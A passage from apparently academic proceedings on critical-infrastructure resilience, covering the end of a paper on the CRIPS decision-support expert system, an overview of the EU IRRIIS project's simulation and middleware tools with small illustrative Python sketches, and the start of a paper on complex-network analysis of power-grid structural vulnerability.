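```python
# Sketch: recognise a known critical chain of events from the switching
# history, as in the example above. The known chain and the recommended
# countermeasure follow the example; the matching logic is illustrative.

KNOWN_CHAIN = ["L1 off", "L25 off", "L7 off"]        # steps 1-3 above
RECOMMENDATION = "switch off line L70 (P21h P13h)"   # stops the cascade

def check_history(history):
    """Fire when the critical prefix of the chain has been observed."""
    if history[-len(KNOWN_CHAIN):] == KNOWN_CHAIN:
        return RECOMMENDATION
    return None

print(check_history(["L1 off", "L25 off", "L7 off"]))
```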
6 Application in Real Network Operation
It is assumed that the use of simulation and planning systems like PSS®SINCAL is well known, so this chapter focusses on the functionality of CRIPS. Furthermore, there are many systems available on the market which are, or can be, used in control centres to support the daily work. The main benefit of an integrated system PSS®SINCAL–CRIPS is:

The physical analysis of a power network is combined with an assessment and with decision support in case of critical situations.

In this way, the whole spectrum of the operation of power networks can be covered: the physical analysis of the network is complemented by an automatic provision of the knowledge of experts, resulting from experience and lessons learned concerning the management of critical situations.

A central problem in structuring the knowledge base is the answer to the question: how to define a critical situation? A simple definition via "current data of indicator components" is only one possibility. The documentation of blackouts that have already happened shows that a critical situation often cannot be seen in the current network data alone; a certain "history of these data" (the development of the current situation) has to be taken into account. The modelling of the knowledge and its subjects will be the task of a knowledge engineer.

A rule structure (horn clauses) is described in Sect. 4.2, and prototypical experiments support the thesis: a modelling of the assessment and decision support problem by simply structured horn clauses is possible, and it guarantees reliable and consistent maintenance of the knowledge base.

The functionality of CRIPS works in the background; no special user interface is necessary: the results can easily be integrated into already existing monitoring screens. The scanning rules are permanently applied to the data of the corresponding grid for assessment.
References

1. IRRIIS: Integrated Risk Reduction of Information-based Infrastructure Systems. 6th Framework Programme, http://www.irriis.org
2. PSS®SINCAL system manual, description of the program, www.siemens.com/systemplanning (follow the link "software solutions")
3. Dellwing, H., Schmitz, W.: Expert System CRIPS: Support of Situation Assessment and Decision Making. In: Lopez, J., Hämmerli, B.M. (eds.) CRITIS 2007. LNCS, vol. 5141. Springer, Heidelberg (2008)
4. Russell, S., Norvig, P.: Künstliche Intelligenz – Ein moderner Ansatz. Prentice-Hall, Englewood Cliffs (2004)
Information Modelling and Simulation in Large Dependent Critical Infrastructures – An Overview on the European Integrated Project IRRIIS

Rüdiger Klein (Project Coordinator of the EU Project IRRIIS)

Fraunhofer IAIS, Schloss Birlinghoven, D-53757 Sankt Augustin, Germany
Ruediger.Klein@IAIS.Fraunhofer.de
Abstract. IRRIIS ("Integrated Risk Reduction of Information-based Infrastructure Systems") is a European Integrated Project started in February 2006 within the 6th Framework Programme and ending in July 2009. The aim of IRRIIS is to develop methodologies, models and tools for the analysis, simulation and improved management of dependent and interdependent Critical Infrastructures (CIs). Middleware Improved Technology (MIT) will provide new communication and information processing facilities in order to manage CI dependencies. This paper gives an overview of the IRRIIS project and outlines these methodologies, models, and tools. Scenarios of dependent CIs developed in IRRIIS are used to validate our approach and to demonstrate the usefulness of our results.

Keywords: critical infrastructures, dependability, CI dependency, information models, federated simulation, simulation environment, improved CI communication and management.
1 Introduction
Critical infrastructures (CIs) are getting more and more complex. At the same time, their dependencies and interdependencies grow. Interactions through direct connectivity, through policies and procedures, or simply as a result of geographical neighbourhood often create complex relationships, dependencies, and interdependencies that cross infrastructure boundaries. In the years to come, the number, diversity, and importance of critical infrastructures as well as their dependencies will continue to increase. The EU project "Integrated Risk Reduction of Information-based Infrastructure Systems" (IRRIIS) is a European project within the 6th Framework Programme [1]. It started in February 2006 with a duration of 3.5 years and includes 16 partners from nine European countries: industrial companies like Siemens, Telecom Italia,
Red Electrica, ACEA, and Alcatel-Lucent; research organisations like Fraunhofer, VTT, TNO, IABG, and ENEA; universities like City University London, ETH Zürich, and Telecom Paris Tech; and SMEs like AIS Malta and Grupo AIA in Barcelona.

Modelling and simulation of critical infrastructures is of course not a new topic. For recent overviews of this subject see, for instance, [2,3,4]. The IRRIIS project has a clear focus on substantially enhancing the dependability of dependent large complex Critical Infrastructures (CIs) by introducing appropriate middleware-based communication technologies between CIs.

The key idea behind the IRRIIS project is the following: if CIs depend on each other, they have to be able to communicate with each other in order to manage these dependencies. The challenge is that these Critical Infrastructures are quite different in their structure, behaviour, and dependencies. Dependent CIs form a network of networks. In order to provide valuable support for their management and control, we have to describe this network of networks at an appropriate level of technical detail.

The communication between dependent CIs will allow us to use information from one CI to operate the dependent CI. This will be facilitated by so-called Middleware Improved Technology (MIT), including a communication backbone and MIT add-on components to process information from/to dependent CIs. In order to develop and optimise this information interchange, appropriate simulation techniques are needed. They have to provide the necessary modelling granularity and diversity in order to model and simulate the behaviour and control of large, complex, dependent, heterogeneous networks of networks. This is the second research focus of the IRRIIS project. It is closely related to MIT and enables its development.

IRRIIS' main objectives can be summarized as follows:

– to determine a sound set of public and private sector requirements based upon scenarios and related data analysis;
– to design, develop, integrate and test communication components suitable for preventing and limiting cascading effects as well as supporting recovery and service continuity in critical situations;
– to develop, integrate, and validate novel and advanced modelling and simulation tools integrated into a simulation environment for experiments and exercises; and
– to validate the functions of the middleware communication (MIT) components using the simulation environment and the results of the scenario and data analysis.

Because of their central importance and their typical dependencies, electrical power infrastructures and their supporting telecommunication infrastructures were chosen as example test cases. The IRRIIS approach is based on the analysis of vulnerabilities of large complex CIs and on the knowledge CI stakeholders have acquired about the management and control of their systems [5]. Novel types of ICT systems are tested and validated by applying the IRRIIS simulation environment in comprehensive experiments.
The IRRIIS project is a highly interdisciplinary effort. It brings together researchers from quite different domains: industrial stakeholders from the power and telecommunication domains, experts in dependability analysis, and specialists in various modelling and simulation techniques. The challenge is to develop a coherent approach including methodological, modelling and simulation aspects. Scenarios and experiments are developed and used to validate and optimise the approach.

This paper gives an overview of the results reached so far within this project. We start with an overview of methodological issues relevant for dependency modelling and management of Critical Infrastructures (Section 2). The models used in IRRIIS are summarized in Section 3. The SimCIP simulation tool, developed in the IRRIIS project for the simulation of Critical Infrastructure dependencies, is outlined in Section 4. Section 5 contains a brief introduction to the MIT methods and tools created in our project. Section 6 is devoted to the scenarios used in IRRIIS, followed by a summary and outlook in Section 7.
2 The IRRIIS Methodology
Methodological work and empirical studies done in IRRIIS have resulted in an increased understanding of dependencies and interdependencies between CIs [6]. Dependency is typically not an on/off relationship, as most models up to now assume, but a relationship of qualities (e.g. pressure, biological contamination level) which have specific decay and restore behaviour¹. These empirical studies underline the growing importance of CI dependencies. This improved understanding of CI dependencies provides the ground for our methodology, our modelling approaches, the tools developed, and the prepared scenarios and experiments.

Fig. 1 shows a typical case for the methodology developed in IRRIIS, which is also used as one of our test cases: the so-called Rome scenario (see also Section 6). Power and telecommunication systems depend on each other in this scenario in different ways. Power networks have their own telecommunication networks connecting power components with SCADA control centres. In parallel, they use additional external telecommunication networks to avoid building expensive proprietary information infrastructures, or simply as back-up systems for their own networks. The other way round is also of very high relevance: telecommunication networks need electrical power, typically coming from standard power networks. Hence, these power systems have to provide the energy needed to maintain the back-up power systems which allow the telecommunication networks to survive a certain amount of time until the standard energy sources work again.
¹ Dependencies and interdependencies: analysis of empirical data on CI dependencies all over the world shows that mutual dependencies or interdependencies are seldom reported in the news and in CI disruption incident reports. Only three cases with interdependencies have been found worldwide among over 1050 CI outage incidents with dependencies [6].
Fig. 1. The example Rome scenario: it shows four power and telecommunication networks in Rome with some of their components and their dependencies
This is a typical case of CI dependencies. Networks provide and need services from each other. This can happen within the same domain (power–power, telecommunication–telecommunication) or between different domains (for instance power–telecommunication). Correspondingly, we address different types of dependencies: physical, cyber, logical, and geographic [7].

Today, the management and control of critical infrastructures depend to a large extent on information and communication technologies (ICT). They provide the "nerve systems" of these large infrastructures. There are highly sophisticated software systems allowing stakeholders to manage, control, and analyse their own systems under more or less every condition. What is frequently missing today is information about the other systems the respective network depends on in one way or the other. But these dependencies are of growing importance: not just for dependability but also for economic efficiency.

There are a number of reasons for the problems related to dependencies between CIs:

– Every network is different. This is true for networks of the same domain (power, telecommunication, etc.), and of course also for CIs from different domains. Consequently, each network has its own approach to information management and control.
– For a long time, Critical Infrastructures have been relatively stable and homogeneous. There was one national telecommunication network built over decades, and there was one national power transmission system with stable structures. Today, we encounter a growing diversity within these domains, from a technical perspective and from an organisational/commercial one.
– Information and communication techniques are key issues in this context today, as enablers and as new risk factors. The World Wide Web, mobile and
IP-based communication services, and the upcoming Web of Things build a ubiquitous ICT infrastructure which enables completely new approaches to managing Critical Infrastructures. It also generates new risk factors: a loss of communication within a CI may disable its function partially or completely. The ICT systems are themselves highly interconnected Critical Infrastructures, vulnerable to failures and attacks.

The information systems currently used in critical infrastructures tend to be very different. There is no common modelling approach. The ICT systems used for the management and control of CIs are highly sophisticated and highly adapted to the special needs of the respective network. The challenge for the IRRIIS project is to provide new approaches to information modelling, information processing and simulation, as well as to communication between CIs, which enable them to manage their dependencies.
3 Models in IRRIIS
In order to achieve the main goals of CI dependency analysis and management, we need models which allow us to capture the essential aspects of Critical Infrastructure behaviours and their dependencies. This can be done on different levels of abstraction. In IRRIIS, we use two kinds of models:

– Four different network analysis approaches (see Subsection 3.1) which abstract away many technical details of Critical Infrastructures and allow us to run complex simulations [8]:
  - the NAT approach;
  - the Preliminary Interdependency Analysis (PIA) with the Möbius tool;
  - the Leontief approach; and
  - the bio-inspired dynamic network analysis.
– A more detailed technical modelling and simulation which allows us to describe dependent Critical Infrastructures as a network of networks, including the services they provide to each other, their logical dependencies, and the temporal aspects of their behaviours. This modelling approach, called the IRRIIS Information Model, is described in more detail in Subsection 3.2 and in [9]. The simulation of IRRIIS Information Models with the SimCIP simulation tool is outlined in Section 4.
3.1 Network Models in IRRIIS
To analyse the impact of dependencies on Critical Infrastructure operability, a number of models at various levels of granularity have been developed within IRRIIS. These range from high-fidelity, scenario-specific models used within the SimCIP simulation environment (see Subsection 3.2) to models based on services or on the physical topology of networks. Within these boundaries, a number of models with various objectives have been applied. These
medium- and low-fidelity models have, as a consequence of their level of abstraction, some advantages: they allow us to study very large systems, and they take into account the uncertainty inherent in analysing large-scale Critical Infrastructure operation. Uncertainty in these systems may arise either from a lack of available system data or from the complexity of these systems. In [9] we have classified these models, distinguishing between models that give generic and specific results. Within this section we briefly discuss these two types of models.

Generic models give results that are applicable to a wide class of situations, while specific models give results based on the functional and topological peculiarities of particular networks. Typically, the generic models are used to test hypotheses that depend on general properties of the modelled network, while specific models help to either anticipate the behaviour, or assess the properties, of concrete systems. Generic models include the Leontief-based model [10], the generic cascading model [10], the common-mode failure model [11], and stationary/dynamic cascading models [11]. Specific models are based either on functional relationships between/within infrastructures or on physical network topologies. Functional models are employed in the Preliminary Interdependency Analysis (PIA) [10]. Also, the Implementation-Service-Effect (ISE) model [12] is an example of a function-based model used within IRRIIS. Alternatively, a study of the evolution of the French power grid [11] uses models of specific physical network topologies. This is also the case for a stochastic analysis of interacting networks carried out within IRRIIS [10].

The results of these models are complementary; service-based modelling provides information about dependencies that is different from modelling based on network topology. These, in turn, are complementary to the detailed SimCIP-based models, which focus on simulating network operation under specific scenarios. Furthermore, some of these models may be used as part of an effort to validate MIT-related hypotheses (e.g., assumptions, made by the designers of an MIT component, about the long-run consequences of MIT in operation).
3.2 The IRRIIS Information Model
Many different kinds of information are relevant for CI dependency analysis, modelling, and simulation. Because dependencies exist between quite different systems, information exchange between them about critical situations, risks, and vulnerabilities needs a system-independent approach. Proprietary information approaches are not sufficient for this purpose. We need a generic information model as a reference model or lingua franca for communication between CIs [9,13]. This reference model allows us to exchange information between different systems in a way that the meaning of this information is "understood" by all stakeholders and their ICT systems, independent of the concrete kind of CI.

In order to achieve the necessary granularity and precision of our models for detailed technical simulations, and for the analysis of dependencies based on this simulation, we need an expressive information model [9,19,20]. This information has to be processed in different kinds of ICT systems, so we need models with clear semantics. For this purpose we build the IRRIIS Information Model on
semantic modelling techniques [14]. The IRRIIS Information Model can be seen as an ontology [15] of Critical Infrastructures and their dependencies [20]. It is described in detail within these proceedings [1a].
4 The SimCIP Simulation Tool
SimCIP (Simulator for Critical Infrastructure Protection applications) is an agent-based simulation system based on the LAMPS (Language for Agent-based Simulation of Processes and Scenarios) language and the LAMPSYS agent simulation framework, both developed at Fraunhofer IAIS [16,17,18]. It provides the main modelling and simulation platform for Critical Infrastructures and their dependencies and allows us to simulate different scenarios on different CI models. The integrated MIT tools provide the communication capabilities between different Critical Infrastructures, one of the main goals of the IRRIIS project.
Fig. 2. SimCIP GUI
The IRRIIS Information Model (see Subsection 3.2) is implemented as a SimCIP model. The SimCIP modelling environment is completely agent based. CIs differ to a large extent in their structure, the types of components they have, their behaviours, etc. The agent-based modelling and simulation capabilities of SimCIP enable us to model these quite different CIs in a coherent and transparent way.

SimCIP comes with a sophisticated GUI (see Fig. 2) and enables the user to create, edit, modify, copy, rename and delete agents, as well as to functionally connect them to each other. These agents represent the components of critical infrastructures, their attributes and their behaviour. Agents belong to different types with different attributes and behaviours. Their connections can also be of different types, allowing us to describe different kinds of dependencies. In this way SimCIP allows us to build complex network-of-networks models of dependent Critical Infrastructures within one SimCIP simulation model.
Fig. 3. Behaviour of an agent
Events allow us to trigger state changes of components (agents) from outside. These changes are propagated through the agent network and allow us to simulate the network behaviour. Events can be collected into complete scenarios in which different events happen at defined points in time, affecting various components in our network model. The behaviour of agents can be characterised by various temporal aspects: delays, declines, etc. (see Fig. 3). The state of an agent can depend on the states of related agents. A change of an agent's state is propagated according to these relationships within the network. This allows us to model complex Critical Infrastructures of quite different types, including their dependencies.

The simulation of network behaviour can require quite special algorithms (for instance, routing in telecommunication networks, or load distribution in power networks). It is not feasible to re-implement such special behaviours within SimCIP. For this reason SimCIP supports federated simulation: external special-purpose simulators can be integrated with SimCIP, and their simulation capabilities can then be used within the overall SimCIP simulations. The expressive IRRIIS Information Model, which provides the basis for SimCIP, allows us to use a very flexible semantic approach to federated simulation.
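As a toy illustration of this event-driven propagation along dependency relationships, the following sketch models a power–telecommunication–SCADA chain; it is not the actual LAMPS/SimCIP API, and it omits temporal aspects such as back-up delays.

```python
# Toy sketch of event-driven state propagation between dependent components,
# in the spirit of SimCIP's agent model (not the actual LAMPS/SimCIP API).

class Agent:
    def __init__(self, name, needs=()):
        self.name, self.needs, self.state = name, list(needs), "ok"

    def update(self):
        # A component fails if any component it depends on has failed.
        # Real models would add back-up systems and time delays here.
        if any(dep.state == "failed" for dep in self.needs):
            self.state = "failed"

power = Agent("power substation")
telco = Agent("telecom node", needs=[power])   # telecom needs power
scada = Agent("SCADA centre", needs=[telco])   # SCADA needs telecom

power.state = "failed"                         # scenario event at time t
for agent in (telco, scada):                   # propagate along dependencies
    agent.update()
    print(agent.name, "->", agent.state)
```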
5 Middleware Improved Technology
Middleware Improved Technology (MIT) is one of the key concepts behind IRRIIS. Today, Critical Infrastructures need highly sophisticated information and communication technologies for their management and control. But although dependencies on and from other Critical Infrastructures are of growing importance, there is nothing comparable on the control level. MIT shall close this gap: by providing a sophisticated communication platform for the exchange of information between Critical Infrastructures, and by providing appropriate MIT add-on components to manage this information.
The main MIT components developed in IRRIIS are

– the MIT Communication Tool, allowing different CIs to exchange information (see Subsection 5.1);
– the Risk Estimator (RE), which enables the operators of a Critical Infrastructure to process information from dependent CIs and to send critical information from their own network to dependent CIs (Subsection 5.2);
– the CRIPS decision support tool ("CRIsis management and Planning System", see Subsection 5.3);
– TEFS (Tools for Extraction of Functional Status), a simple data interface to SCADA and control systems; and
– IKA (the Incident Knowledge Analyser²).

All MIT components are integrated into the SimCIP simulation platform in order to enable experiments on scenarios. In this way we will validate how well they fit the needs of improved communication between dependent Critical Infrastructures.
Fig. 4. Overview of the MIT architecture: each Critical Infrastructure uses MIT add-on components like the Risk Estimator (RE), the decision support tool CRIPS, TEFS (Tools for Extraction of Functional Status), and IKA (Incident Knowledge Analyser)
5.1 The MIT Communication Tool
Communication between dependent Critical Infrastructures is an essential element for improved dependency management and increased dependability. The MIT communication backbone was designed and implemented for this purpose. Each CI has its own interface to the backbone and is enabled to send and receive messages to/from dependent CIs (see Fig. 4). The CI control centres can receive information through the MIT backbone from dependent CIs and process this information for their own purposes with the MIT add-on components like the Risk Estimator, the decision support tool CRIPS, etc. The information exchanged via the MIT communicator is based on the IRRIIS Information Model (see Subsection 3.2). It is represented in the Risk Modelling Language (RML), an XML-shaped version of the IRRIIS Information Model supporting information exchange through the Web services used in the MIT communication backbone [12].
² IKA will be described in a forthcoming publication.
5.2 The Risk Estimator
A key assumption behind the Risk Estimator is that specific conditions within one CI may not be critical by themselves, but may become critical in combination with other situations. Therefore, this MIT add-on component combines and analyses more information than only the information from its home CI (see Fig. 5). It allows us to give approximate risk estimates using a relatively simple rule-based approach. The estimations take into account: real-time information (internal assessment), status information from other dependent CIs, wide-area planning information, scheduled maintenance, weather forecasts, strikes, major public events, software/hardware vulnerabilities, and other public information sources.
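As a rough illustration of such a rule-based combination of heterogeneous inputs, the following sketch maps a few internal and external indicators to a coarse risk level; the factors, weights and thresholds are invented, not the Risk Estimator's actual rules.

```python
# Sketch of a rule-of-thumb risk estimate combining internal network state
# with information from dependent CIs and contextual factors, in the spirit
# of the Risk Estimator. Factors, weights and thresholds are invented.

def estimate_risk(internal_load, neighbour_ci_degraded, storm_forecast):
    score = 0
    if internal_load > 0.9:        # own network close to its limits
        score += 2
    if neighbour_ci_degraded:      # a dependent CI reports problems
        score += 2
    if storm_forecast:             # adverse wide-area conditions
        score += 1
    return {0: "low", 1: "low", 2: "elevated", 3: "high"}.get(score, "critical")

print(estimate_risk(internal_load=0.95, neighbour_ci_degraded=False,
                    storm_forecast=True))  # -> "high"
```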
5.3 The CRIPS Decision Support Tool
CRIPS ("CRIsis management and Planning System") is an MIT add-on component aimed at supporting the assessment of the state of a CI and, as a conclusion of this assessment, at supporting decision making in order to defuse a possible emergency situation.
Fig. 5. The Risk Estimator
The assessment of the current situation in a network – e.g. in a power network – should more precisely be characterized as a "strategic assessment" of the current situation: the aim is not to identify a normal day-to-day problem, but a situation which can cause a wide-area failure of power supply. CRIPS is characterized as a "knowledge-based tool" and is designed as an expert system:

– Dependency structures relevant for decision support can be formulated as if-then-else rules, and the realization of an expert system supporting a similar decision-making problem in political-military crisis management has proved the applicability of such a representation – and consequently of an expert system – for this task: it is the canonical method.
– The representation of knowledge is simply structured – a characteristic quality of an expert system, in which the knowledge is separated from its processing (inference). This in particular guarantees the required easy maintenance of the knowledge base.
6 Scenarios and Experiments
In order to be as close as necessary to the behaviour of real Critical Infrastructures, the models we can build and simulate in SimCIP can be quite complex. The temporal aspects of component behaviours, the logical and other dependencies between components, the redundancies between services, etc. can be described with high precision. The result is that the emergent behaviour of such complex models cannot easily be predicted. For this reason we can run experiments with our models, in which different scenarios are applied to a model of dependent CIs. This allows us to analyse in a systematic way how models of dependent CIs behave under certain circumstances, and how MIT components support the reduction of cascading failures.

The first scenario created in the project is the (already mentioned) Rome scenario (see also Fig. 1). It consists of four dependent Critical Infrastructures: two from the power domain and two related ones from the telecommunication sector. This scenario forms a good playground for our experiments. It has been modelled using the IRRIIS Information Model and implemented within the SimCIP simulation environment. Siemens' Sincal power network simulator has been integrated with SimCIP in order to provide those aspects of power network simulation which are not directly facilitated by SimCIP³.

SimCIP enables the specification of scenarios as sequences of events and actions happening as part of the network simulation. An event triggers a state transition in one of the network components. If this component belongs to one of the power networks, its state transition is propagated to the Sincal power network simulator. The states of all related power network components are calculated there and propagated back to SimCIP. SimCIP interprets all resulting states and classifies them according to some general classification rules. These classifications may trigger new events as transitions of states. Loss of power in a telecommunication component means activation of its back-up power systems. If these do not work either, or if after some time the back-up systems also fail, the telecommunication component cannot provide its service anymore. This lost service can have consequences for dependent networks, and so on.

The federated simulation of SimCIP, with its fine-grained model of heterogeneous networks and its integrated external simulator(s), enables the creation of quite complex and realistic scenarios for the investigation of dependencies of Critical Infrastructures and for the assessment of the benefits of MIT components.
³ In a next step, a telecommunication network simulator will also be integrated into SimCIP in order to enhance this aspect of dependency simulation.
7 Summary and Outlook
IRRIIS is an interdisciplinary project dedicated to the analysis, modelling, simulation, and improved operation of dependent Critical Infrastructures. We analysed a number of network analysis approaches for their contributions to the understanding of dependencies. In parallel, we created the IRRIIS Information Model as a lingua franca for communication between dependent CIs and as a platform for CI simulation and analysis. The concept of Middleware Improved Technology (MIT) was created in IRRIIS in order to improve information sharing between dependent CIs. MIT components like the MIT communication backbone, the Risk Estimator, and the CRIPS decision support tool were implemented. The SimCIP simulation tool was developed as a platform for CI simulations and for experiments with our MIT tools. It enables us to use IRRIIS Information Models for complex dependent CIs at the necessary level of technical precision. SimCIP supports federated simulation through the integration of external special-purpose simulators. Scenarios allow us to investigate dependent Critical Infrastructures and their emergent behaviour. We can validate, through experiments with different scenarios, how well our models and concepts fit the needs of improved CI management.

IRRIIS will end in July 2009. The remaining months will be used

– to improve and extend our modelling and simulation capabilities in order to enable users of our tools to build and simulate critical infrastructures and their dependencies;
– to enhance the functionality of risk estimation and decision support, including a tight integration into our simulation environment SimCIP;
– to build new scenarios directed especially towards next-generation Critical Infrastructures;
– to run systematic experiments with the existing and the new scenarios in order to get a more comprehensive understanding of the emergent behaviour and of the benefits of MIT components; and
– to disseminate our results to a broad audience in the academic community and especially to industry, in order to guarantee widespread usage of our results.
Acknowledgement. The research described in this paper was partly funded by the EU Commission within the 6th IST Framework Programme in the IRRIIS Integrated Project under contract no. 027568. The author thanks all project partners for many interesting discussions which greatly helped to achieve the results described here.
References

1. The IRRIIS European Integrated Project, http://www.irriis.org; Klein, R., et al.: The IRRIIS Information Model. In: Setola, R., Geretshuber, S. (eds.) CRITIS 2008. LNCS, vol. 5508. Springer, Heidelberg (2009)
2. Pederson, P., et al.: Critical Infrastructure Interdependency Modeling: A Survey of U.S. and International Research. Technical Report, Idaho National Lab (August 2006)
3. Hämmerli, B.M. (ed.): CRITIS 2007. LNCS, vol. 5141. Springer, Heidelberg (2007)
4. Kröger, W.: Critical infrastructures at risk: A need for a new conceptual approach and extended analytical tools. Reliability Engineering and System Safety 93, 1781–1787 (2008)
5. Beyer, U., Flentge, F.: Towards a Holistic Metamodel for Systems of Critical Infrastructures. ECN CIIP Newsletter (October/November 2006)
6. Nieuwenhuijs, A.H., Luiijf, H.A.M., Klaver, M.H.A.: Modeling Critical Infrastructure Dependencies. In: Shenoi, S. (ed.) Critical Infrastructure Protection, IFIP International Federation for Information Processing. Springer, Boston (2008) (to appear)
7. Rinaldi, S., Peerenboom, J., Kelly, T.: Identifying, Understanding, and Analyzing Critical Infrastructure Interdependencies. IEEE Control Systems Magazine, 11–25 (December 2001)
8. Bloomfield, R., Popov, P., Salako, K., Wright, D., Buzna, L., Ciancamerla, E., Di Blasi, S., Minichino, M., Rosato, V.: Analysis of Critical Infrastructure Dependence – An IRRIIS Perspective. In: Klein, R. (ed.) Proc. IRRIIS Workshop at CRITIS 2008, Frascati, Italy (October 2008)
9. Klein, R., et al.: The IRRIIS Information Model. In: Proc. CRITIS 2008, Frascati, Italy. LNCS. Springer, Heidelberg (2008)
10. Minichino, M., et al.: Tools and Techniques for Interdependency Analysis. Deliverable D2.2.2, The IRRIIS Consortium (July 2007), http://www.irriis.org
11. IRRIIS Deliverable D2.1.2: Final Report on Analysis and Modelling of LCCI Topology, Vulnerability and Decentralised Recovery Strategies. The IRRIIS Consortium (2007), http://www.irriis.org
12. Flentge, F., Beyel, C., Rome, E.: Towards a Standardised Cross-Sector Information Exchange on Present Risk Factors. In: Hämmerli, B.M. (ed.) CRITIS 2007. LNCS, vol. 5141, pp. 369–380. Springer, Heidelberg (2008)
13. Rathnam, T.: Using Ontologies to Support Interoperability in Federated Simulation. M.Sc. thesis, Georgia Institute of Technology, Atlanta, GA, USA (August 2004)
14. Staab, S., Studer, R. (eds.): Handbook on Ontologies. International Handbooks on Information Systems. Springer, Heidelberg (2004)
15. Gruber, T.: Toward Principles for the Design of Ontologies Used for Knowledge Sharing. In: Proceedings of the International Workshop on Formal Ontology, Padova, Italy (March 1993)
16. Beyel, C., et al.: SimCIP Functional Specification. Deliverable D2.3.1, The IRRIIS Consortium (March 2007), http://www.irriis.org
17. Beyel, C., et al.: SimCIP Architecture. Deliverable D2.3.2, The IRRIIS Consortium (March 2007), http://www.irriis.org
18. Beyel, C., et al.: SimCIP Simulation Environment. Deliverable D2.3.7, The IRRIIS Consortium (August 2008), http://www.irriis.org
19. Annoni, A.: Orchestra: Developing a Unified Open Architecture for Risk Management Applications. In: van Oosterom, P., et al. (eds.) Geo-information for Disaster Management. Springer, Heidelberg (2005)
20. Min, H.J., Beyeler, W., Brown, T., Son, Y.J., Jones, A.T.: Toward Modeling and Simulation of Critical National Infrastructure Interdependencies. IIE Transactions 39, 57–71 (2007)
Assessment of Structural Vulnerability for Power Grids by Network Performance Based on Complex Networks

Ettore Bompard¹, Marcelo Masera², Roberto Napoli¹, and Fei Xue¹

¹ Department of Electrical Engineering, Politecnico di Torino, Corso Duca degli Abruzzi 24, I-10129 Torino, Italy
ettore.bompard@polito.it, roberto.napoli@polito.it, fei.xue@polito.it
² Institute for the Protection and Security of the Citizen, Joint Research Centre – European Commission, T.P. 210, I-21020 Ispra (VA), Italy
marcelo.masera@jrc.it
Abstract. Power grids have been widely acknowledged as complex networks (CN) since this theory emerged, and they have received considerable attention recently. Much work has been done to investigate the structural vulnerability of power grids from a topological point of view based on CN. However, most of it applies the concepts and measurements of CN directly to the analysis of power grids, which have specific features that cannot be reflected from a generic perspective. This paper identifies several of the most serious obstacles to applying CN to the vulnerability analysis of power grids. Based on the proposed solutions to these obstacles, a specific concept of network performance, indicating the power supply ability of the network, is defined. Furthermore, the proposed method is investigated on a 34-bus test system, in comparison with results obtained from the general concept of efficiency in CN, to show its effectiveness.
1 Introduction

A vast number of hazards threaten public facilities, due both to accidents and to intentional attacks; both may have disastrous social and economic effects. Among public facilities, the infrastructural systems for electric power delivery have a particular importance, since they are widely distributed and indispensable to modern society. Outages of power systems may have severe impacts on a country in many respects [1]. Meanwhile, the catastrophic consequences of blackouts have indicated possible threats from terrorist attacks exploiting the vulnerabilities of power systems. This has attracted many scientists to work in this field [2][3]. However, these works are mostly based on classical and detailed physical models, which need complete information and data on system operation. On the contrary, given the complex features of the security problem and the complicated influence of the power market caused by deregulation, neither attackers nor defenders are able to predict the exact system operating states before the attacks are actually performed. Especially for attackers, it would be very difficult to obtain complete information with which to build a detailed physical model and support decision making. Therefore, the problem of malicious threats should be analyzed from a statistical and general perspective, where CN theory has its strengths [4].
Complex networks have received considerable attention recently, since small-world behaviour [5] and scale-free characteristics [6] have been discovered in many real networks. Since power grids have been widely acknowledged as a typical type of CN, many works have applied concepts and measurements of CN to analyze structural vulnerabilities [4][7][8][9] or the mechanism of cascading failure [10][11][12] in power grids. However, the theory of CN has developed mostly from a generic physical perspective, which focuses on the common features of all networks of interest and on common concepts and measurements. In contrast, the functions and physical rules of different networks can be totally different and have many specific characteristics that cannot be dealt with by general methodologies. When the theory of CN is gradually applied to fields involving the specific features of networks, such as the protection of networked infrastructures, it is unavoidable to adapt the common concepts and measurements to the considered scenarios.

In this paper, based on a reconsideration of former works applying the general theory of CN to the analysis of power grid vulnerabilities, several serious obstacles which are crucial for analyzing the structural vulnerabilities of power grids with CN are identified. Furthermore, solutions to these obstacles, based on the professional knowledge of power system engineering, are presented in order to define a global network performance of power grids for the security analysis of power systems. The proposed method is applied to a 34-bus test system to find the most vulnerable line, in contrast with the results from former methods of general CN theory, to prove its effectiveness.

The next section presents the serious obstacles that have to be specially considered when applying CN to the topological analysis of power grid vulnerabilities. Section 3 proposes solutions to these obstacles based on power system engineering and defines the global network performance of power grids. In Section 4, an analysis of security and vulnerability based on these propositions is performed on a 34-bus system to find the most vulnerable line. Conclusions are drawn in Section 5.
2 Several Main Obstacles to the Application of CN to the Analysis of Power Grids

2.1 Paths and Their Contributions

The concept of the length of a path is a basic factor of CN theory, where it is defined as the number of edges along the path. This is important, since it relates to the identification of the shortest path and to the calculation of betweenness or the evaluation of network performance [4][7][8][9]. From the perspective of power engineering, the "length" of a path should reflect the difficulty or cost of transferring power flow between two nodes along the path. In a power grid, the difficulty or obstacle for the transmission of electricity is described by the impedance of the transmission lines, which can be considered as an "electrical distance". From this point of view, the number of lines cannot give a meaningful indication for electrical power engineering.

Furthermore, another problem – and the most unrealistic assumption – related to paths in the definition of betweenness [4][12] and efficiency [8] is that the power is routed
through the shortest or most efficient paths only, while all other paths are ignored. However, in power grids the transmission of power through the network is completely determined by physical rules. As is well known in power engineering, the power transmission between two nodes involves many different existing paths, to different extents. This is an inherent feature depending on the network structure, and it can be captured by the Power Transmission Distribution Factors (PTDF). The PTDF is a matrix that reflects the sensitivity of the power flow on the lines to changes in the injection power of the buses. For a network with N nodes and Y lines, the matrix of PTDF with node j as the reference bus can be written as

$A = \begin{pmatrix} a_{11} & a_{12} & \cdots & a_{1N} \\ a_{21} & a_{22} & \cdots & a_{2N} \\ \vdots & \vdots & \ddots & \vdots \\ a_{Y1} & a_{Y2} & \cdots & a_{YN} \end{pmatrix}$   (1)

For each column $A_{\cdot i}(j) = [a_{1i}, a_{2i}, \ldots, a_{Yi}]$, the values can be calculated by supposing that one unit of power is injected at node i and one unit of power is consumed at the reference node j; the resulting DC power flow on line l is then exactly the value of $a_{li}$ $(l = 1, 2, \ldots, Y)$.

2.2 Load and Betweenness

